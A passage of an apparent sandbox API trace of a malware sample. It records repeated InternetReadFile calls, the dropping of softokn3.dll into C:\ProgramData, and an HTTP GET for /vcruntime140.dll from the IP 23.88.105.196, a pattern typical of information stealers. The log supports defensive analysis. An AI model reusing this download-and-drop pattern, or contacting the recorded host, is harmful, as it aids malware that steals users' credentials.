lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.827] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbb5d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbb5d8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.827] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbb9c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbb9c0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.827] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbbda8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbbda8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.827] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbc190, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbc190*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.828] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbc578, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbc578*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.828] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbc960, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbc960*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.828] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbcd48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbcd48*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.828] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbd130, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbd130*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.828] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbd518, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbd518*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.828] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbd900, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbd900*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.828] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbdce8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbdce8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.829] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbe0d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbe0d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.829] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbe4b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbe4b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.829] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbe8a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbe8a0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.829] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbec88, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbec88*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.829] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbf070, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbf070*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.829] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbf458, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbf458*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.830] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbf840, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbf840*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.830] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cbfc28, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cbfc28*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.830] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc0010, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc0010*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.830] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc03f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc03f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.830] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc07e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc07e0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.830] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc0bc8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc0bc8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.830] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc0fb0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc0fb0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.831] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc1398, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc1398*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.831] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc1780, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc1780*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.831] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc1b68, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc1b68*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.831] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc1f50, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc1f50*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.831] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc2338, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc2338*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.831] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc2720, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc2720*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.831] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc2b08, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc2b08*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.832] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc2ef0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc2ef0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.832] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc32d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc32d8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.832] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc36c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc36c0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.832] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc3aa8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc3aa8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.832] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc3e90, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc3e90*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.832] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc4278, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc4278*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.832] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc4660, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc4660*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.833] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc4a48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc4a48*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.833] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc4e30, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc4e30*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.833] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc5218, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc5218*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.833] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc5600, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc5600*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.833] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc59e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc59e8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.833] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc5dd0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc5dd0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.834] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc61b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc61b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.834] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc65a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc65a0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.834] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc6988, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc6988*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.834] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc6d70, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc6d70*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.834] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc7158, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc7158*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.834] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc7540, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc7540*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.834] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc7928, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc7928*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.835] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc7d10, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc7d10*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.835] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc80f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc80f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.835] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc84e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc84e0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.835] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc88c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc88c8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.835] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc8cb0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc8cb0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.835] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc9098, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc9098*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.836] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc9480, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc9480*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.836] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc9868, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc9868*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.836] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cc9c50, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cc9c50*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.836] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cca038, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cca038*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.836] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cca420, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cca420*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.836] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cca808, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cca808*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.837] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3ccabf0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3ccabf0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.837] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3ccafd8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3ccafd8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.837] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3ccb3c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3ccb3c0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.837] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3ccb7a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3ccb7a8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.837] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3ccbb90, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3ccbb90*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.837] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3ccbf78, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3ccbf78*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.838] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3ccc360, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3ccc360*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.838] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3ccc748, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3ccc748*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.838] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cccb30, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cccb30*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.838] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cccf18, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cccf18*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.838] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3ccd300, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3ccd300*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.838] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3ccd6e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3ccd6e8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.838] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3ccdad0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3ccdad0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.839] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3ccdeb8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3ccdeb8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.839] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cce2a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cce2a0*, lpdwNumberOfBytesRead=0x19f504*=0x350) returned 1 [0107.839] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cce5f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cce5f0*, lpdwNumberOfBytesRead=0x19f504*=0x0) returned 1 [0107.844] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x1d, lpBuffer=0x19f54c, lpdwBufferLength=0x19f504, lpdwIndex=0x0 | out: lpBuffer=0x19f54c, lpdwBufferLength=0x19f504, lpdwIndex=0x0) returned 0 [0107.844] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0107.844] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0107.844] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0107.844] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1068 | out: hHeap=0x29a0000) returned 1 [0107.844] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0107.844] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1040 [0107.844] CreateFileA (lpFileName="C:\\ProgramData\\\\softokn3.dll" (normalized: "c:\\programdata\\softokn3.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0107.845] WriteFile (in: hFile=0x28, lpBuffer=0x3cab020*, nNumberOfBytesToWrite=0x235d0, lpNumberOfBytesWritten=0x19f6e0, lpOverlapped=0x0 | out: lpBuffer=0x3cab020*, lpNumberOfBytesWritten=0x19f6e0*=0x235d0, lpOverlapped=0x0) returned 1 [0107.849] CloseHandle (hObject=0x28) returned 1 [0107.887] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0107.887] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1040 [0107.887] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1068 [0107.887] GetLastError () returned 0x0 [0107.887] SetLastError (dwErrCode=0x0) [0107.887] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0107.887] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x19f684, dwBufferLength=0x4) returned 1 [0107.887] InternetConnectA (hInternet=0xcc0004, lpszServerName="23.88.105.196", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0107.887] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/vcruntime140.dll", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0107.887] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a11c0 [0107.887] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0107.887] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0107.887] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0107.887] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0107.887] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0107.887] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0107.920] InternetSetFilePointer (in: hFile=0xcc000c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0, dwContext=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.920] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cab020, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cab020*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.921] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cab408, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cab408*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.921] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cab7f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cab7f0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.921] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cabbd8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cabbd8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.921] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cabfc0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cabfc0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.922] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cac3a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cac3a8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.922] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cac790, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cac790*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.922] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cacb78, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cacb78*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.922] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cacf60, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cacf60*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.922] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cad348, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cad348*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.922] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cad730, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cad730*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.922] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cadb18, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cadb18*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.923] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cadf00, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cadf00*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.923] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cae2e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cae2e8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.923] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3cae6d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3cae6d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.923] InternetReadFile (in: hFile=0xcc000c, 